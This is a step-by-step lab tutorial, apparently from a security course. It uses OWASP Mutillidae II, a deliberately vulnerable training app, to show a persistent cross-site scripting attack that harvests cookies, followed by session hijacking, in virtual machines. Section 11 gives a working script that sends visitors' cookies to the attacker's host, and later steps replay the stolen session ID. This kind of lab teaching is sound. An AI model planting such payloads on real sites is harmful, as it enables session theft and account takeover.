{ Man-in-the-Middle, Persistent Covert Cross Site Scripting Injection #2 }
| Section 0. Background Information |
- What is Mutillidae?
- OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.
- What is a Man-In-The-Middle attack?
- The man-in-the-middle attack take on many forms. The most common form is active network eavesdropping in which the attacker is able to gain authentication credentials (Username, Password, SESSIONID, Cookies Information, etc).
- What is a Reflective Cross Site Scripting?
- The non-persistent (or reflected) cross-site scripting vulnerability is by far the most common type. These holes show up when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to parse and display a page of results for and to that user, without properly sanitizing the request.
- What is a Persistent Cross Site Scripting Injection?
- The persistent XSS vulnerability is a more devastating variant because the injection is actually permanently stored in the blog, message board, etc.
- Imagine if a sensitive website had a poor designer did not test for injections. A malicious person could simply put in a hidden cookie harvester script and sit back and watch there logs for SESSION cookies.
- What is Cookies Manager+?
- Cookies manager to view, edit and create new cookies. It also shows extra information about cookies, allows edit multiple cookies at once and backup/restore them.
- In future labs, we will use Cookies Manager to help simulate a man-in-the-middle attack
- Pre-Requisite Lab
- Mutillidae: Lesson 1: How to Install Mutillidae in Fedora
- Note: Remote database access has been turned on to provide an additional vulnerability.
- BackTrack: Lesson 1: Installing BackTrack 5
- Note: This is not absolutely necessary, but if you are a computer security student or professional, you should have a BackTrack VM.
- BackTrack: Lesson 9: How To Install Firebug
- Note: Firebug integrates with Firefox to put a wealth of web development tools at your fingertips while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page.
- Mutillidae: Lesson 13: Reflected Cross Site Scripting Injection #1, Man-In-The-Middle
- Note: If you have not completed the above lab, you will not be able to continue past Section 9.
- Lab Notes
- In this lab we will do the following:
- Due to a purposeful bug in the add-to-your-blog.php code, we will use Persistent Cross Site Scripting Techniques to covert send cookie data to a remote site.
- In the blog, we will place a covert persistent XSS injection in a blog to create a man-in-the-middle attack.
- We will capture the username and session credentials.
- From a remote machine we will login with those username and session credentials.
- Legal Disclaimer - bài hướng dẫn thực hành, chỉ dùng cho môi trường lớp học
| Section 1. Configure Fedora14 Virtual Machine Settings |
- Open Your VMware Player
- Instructions:
- On Your Host Computer, Go To
- Start --> All Program --> VMWare --> VMWare Player
- Edit Fedora Mutillidae Virtual Machine Settings
- Instructions:
- Highlight fedora14
- Click Edit virtual machine settings
- Edit Network Adapter
- Instructions:
- Highlight Network Adapter
- Select Bridged
- Click the OK Button
| Section 2. Login to Fedora14 - Mutillidae |
- Start Fedora14 VM Instance
- Instructions:
- Start Up VMWare Player
- Select Fedora14 - Mutillidae
- Play virtual machine
- Login to Fedora14 - Mutillidae
- Instructions:
- Login: student
- Password: <whatever you set it to>.
-
| Section 3. Open Console Terminal and Retrieve IP Address |
- Start a Terminal Console
- Instructions:
- Applications --> Terminal
- Switch user to root
- Instructions:
- su - root
- <Whatever you set the root password to>
-
- Get IP Address
- Instructions:
- ifconfig -a
- Notes (FYI):
- As indicated below, my IP address is 192.168.1.111.
- Please record your IP address.
| Section 4. Configure BackTrack Virtual Machine Settings |
- Edit the BackTrack5R1 VM
- Instructions:
- Select BackTrack5R1 VM
- Click Edit virtual machine settings
- Edit Virtual Machine Settings
- Instructions:
- Click on Network Adapter
- Click on the Bridged Radio button
- Click on the OK Button
| Section 5. Play and Login to BackTrack |
- Play the BackTrack5R1 VM
- Instructions:
- Click on the BackTrack5R1 VM
- Click on Play virtual machine
- Login to BackTrack
- Instructions:
- Login: root
- Password: toor or <whatever you changed it to>.
- Bring up the GNOME
- Instructions:
- Type startx
| Section 6. Open Console Terminal and Retrieve IP Address |
- Start up a terminal window (On BackTrack5R1)
- Instructions:
- Click on the Terminal Window
- Obtain the IP Address
- Instructions:
- ifconfig -a
- Note(FYI):
- My IP address 192.168.1.112.
- In your case, it will probably be different.
- This is the machine that will be use to attack the victim machine (Mutillidae).
| Section 7. Login to Damn Vulnerable WXP-SP2 (Victim Machine) |
- Edit Virtual Machine Settings
- Instructions:
- Click on Damn Vulnerable WXP-SP2
- Edit Virtual Machine Settings
- Note(FYI):
- This third Virtual Machine does not have to be Windows XP. I just need to be another Virtual Machine to demonstrate how the cookie will be sent covertly with the victim knowing.
- Set Network Adapter
- Instructions:
- Click on Network Adapter
- Click on the radio button "Bridged: Connected directly to the physical network".
- Start Up Damn Vulnerable WXP-SP2.
- Instructions:
- Start Up your VMware Player
- Play virtual machine
- Logging into Damn Vulnerable WXP-SP2.
- Instructions:
- Username: administrator
- Password: <Provide the Password>
- Open a Command Prompt
- Instructions:
- Start --> All Programs --> Accessories --> Command Prompt
- Obtain the IP Address
- Instructions:
- In the Command Prompt type "ipconfig"
- Note(FYI):
- In my case, Damn Vulnerable WXP-SP2's IP Address 192.168.1.116.
- This is the IP Address of the Victim Machine.
- Record your IP Address.
| Section 8. Start Apache Webserver |
- Start Apache2 (On BackTrack5R1)
- Instructions:
- service apache2 start
- service apache2 status
- ps -eaf | grep apache2 | grep -v grep
- Note(FYI):
- Start up the apache2 webserver.
- Display the status of the apache2 webserver.
- See the processes of the apache2 webserver.
| Section 9. Verify Cookie Script Exists |
- Verify Cookie Script Exists (On BackTrack5R1)
- Instructions:
- ls -l /usr/lib/cgi-bin/logit.pl
- cat /dev/null > /var/www/logdir/log.txt
- ls -l /var/www/logdir/log.txt
- Note(FYI):
- List the logit.pl script. If this script is not present, then complete the pre-requisite lab.
- Clear the log.txt havest0r file.
- Notice the log.txt is now a Zero Byte File.
| Section 10. Open Mutillidae |
- Open Firefox (On BackTrack5R1)
- Instructions:
- Click on the Firefox Icon
- Notes (FYI):
- If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
- Open Mutillidae
- Notes (FYI):
- Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
- Instructions:
- Place the following URL in the Address Bar
- http://192.168.1.111/mutillidae/
- Reset Database
- Instructions:
- Click the Reset DB Link
- Notes (FYI):
- This link will remove the XSS Injection from the database.
- Proceed with Database Reset
- Instructions:
- Click the OK Button
| Section 11. Persistent Covert Cross Site Script(XSS) |
- Add to your blog
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting(XSS) --> Persistent(Second Order) --> Add to your blog
- Inspect Element
- Instructions:
- Right Click in the Comment Box
- Click Inspect Element
- Note(FYI):
- This is not a necessary step for the injection. The goal is to allow the injection attempt to remain on the same line instead of being word-wrapped.
- Change Text Area Column Length
- Instructions:
- Change 65 to 95
- Click Close Button (See Picture)
- Covert Cookie Harvest0r Cross Site Script (XSS) Injection
- Note(FYI):
- Replace 192.168.1.112 with your BackTrack IP Address obtained in (Section 6, Step 2).
- This JavaScript tells the web browser to send the cookies back to the CGI Cookie Script on the BackTrack Machine.
- Instructions:
- Place the below text in the comment box.
- <script> new Image().src="http://192.168.1.112/cgi-bin/logit.pl?"+document.cookie; </script>
- Click the Save Blog Entry
- View Cookie Harvest0r Cross Site Script (XSS) Results
- Note(FYI):
- Notice nothing is displayed under the comment cell.
- Or are your eyes deceiving you?
- View the Havest0r Log
- Instructions:
- cat /var/www/logdir/log.txt
- Notes (FYI):
- Although the Blog displayed nothing back to us, it was covertly recorded in our Havest0r log.
- How do you like them apples?
| Section 12. Login to Mutillidae |
- Start up Internet Explo[d]er (On Damn Vulnerable WXP-SP2)
- Instructions:
- Start --> All Programs --> Internet Explorer
- Open the Mutillidae Application
- Notes (FYI):
- Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
- Instructions:
- Place the following URL in the Address Bar
- http://192.168.1.111/mutillidae/
- Click Login/Register
- Login
- Instructions:
- Name: samurai
- Password: samurai
- Click the Login Button
- Notes(FYI):
- We are logging on to Mutillidae to simulate a user logging on to a real application and being granted a Session ID.
- View someone's blog
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Persistent (Second Order) --> View someones's blog
- Show All Blog Entries
- Instructions:
- Select Show All from the down drop menu
- View Blog Entries
- View Blog Entries
- Note(FYI):
- Notice nothing is displayed under the comment cell.
- Is this Deja Vu?
| Section 13. View Havest0r Log |
- View the Havest0r Log (On BackTrack5R1)
- Instructions:
- cat /var/www/logdir/log.txt
- Notes (FYI):
- Notice the cookie now shows the username samurai.
- Notice the cookie now shows the PHP Session ID, which is pretty much equivalent to a password.
| Section 14. Simulate Man-In-The-Middle Attack |
- On BackTrack, Open Firefox (On BackTrack5R1)
- Instructions:
- Click on the Firefox Icon
- Notes (FYI):
- If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
- Start Cookies Manager+
- Instructions:
- Tools --> Cookies Manager+
- Notes (FYI):
- Click here to install Cookie Manager+ you have not already done so.
- Add Cookie Entry
- Instructions:
- Click the Add Button
- Add PHPSESSID Cookie Entry
- Note(FYI):
- Replace jri8sj5cnl6ironsqtnbpo9e21 with your PHPSESSID found in crack_cookies.txt (See Below Picture).
- Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
- Instructions:
- Name: PHPSESSID
- Content: jri8sj5cnl6ironsqtnbpo9e21
- Host: 192.168.1.111
- Path: /
- Click the Save Button.
- Add Cookie Entry
- Instructions:
- Click the Add Button
- Add showhints Cookie Entry
- Note(FYI):
- Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
- Instructions:
- Name: showhints
- Content: 0
- Host: 192.168.1.111
- Path: /mutillidae/
- Click the Save Button
- Add Cookie Entry
- Instructions:
- Click the Add Button
- Add username Cookie Entry
- Note(FYI):
- Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
- Instructions:
- Name: username
- Content: samurai
- Host: 192.168.1.111
- Path: /mutillidae/
- Click the Save Button
- Add Cookie Entry
- Instructions:
- Click the Add Button
- Add uid Cookie Entry
- Note(FYI):
- Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
- Instructions:
- Name: uid
- Content: 6
- Host: 192.168.1.111
- Path: /mutillidae/
- Click the Save Button
- Click the Close Button
- Implement Man-in-the-Middle Attack
- Note(FYI):
- Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
- Notice you will be automagically logged in without a password. For this reason, it is extremely important that session information is (1) not only encrypted, (2) but also users logout after they finish their session.
- Instructions:
- http://192.168.1.111/mutillidae/
- Notice that user samurai logged in without a password.
- On BackTrack, Start up a terminal window (On BackTrack5R1)
- Instructions:
- Click on the Terminal Window
- Proof of Lab, (On a BackTrack Terminal)
- Instructions:
- cd
- ls -l /usr/lib/cgi-bin/logit.pl
- cat /var/www/logdir/log.txt
- sqlite3 ~/.mozilla/firefox/*default/places.sqlite "select * from moz_places;" | grep "add-to-your-blog" | tail -1
- sqlite3, A command line interface for SQLite version 3
- Database File, ~/.mozilla/firefox/*default/places.sqlite
- select * from moz_places, Display all records from the firefox history table.
- grep "add-to-your-blog", Display records that only contain the string "add-to-your-blog".
- tail -1, Only display the last record.
- date
- echo "Your Name"
- Replace the string "Your Name" with your actual name.
- e.g., echo "John Gray"
- Proof of Lab Instructions:
- Do a PrtScn
- Paste into a word document
- Upload to website www.antoanthongtin.edu.vn
-
0 nhận xét:
Đăng nhận xét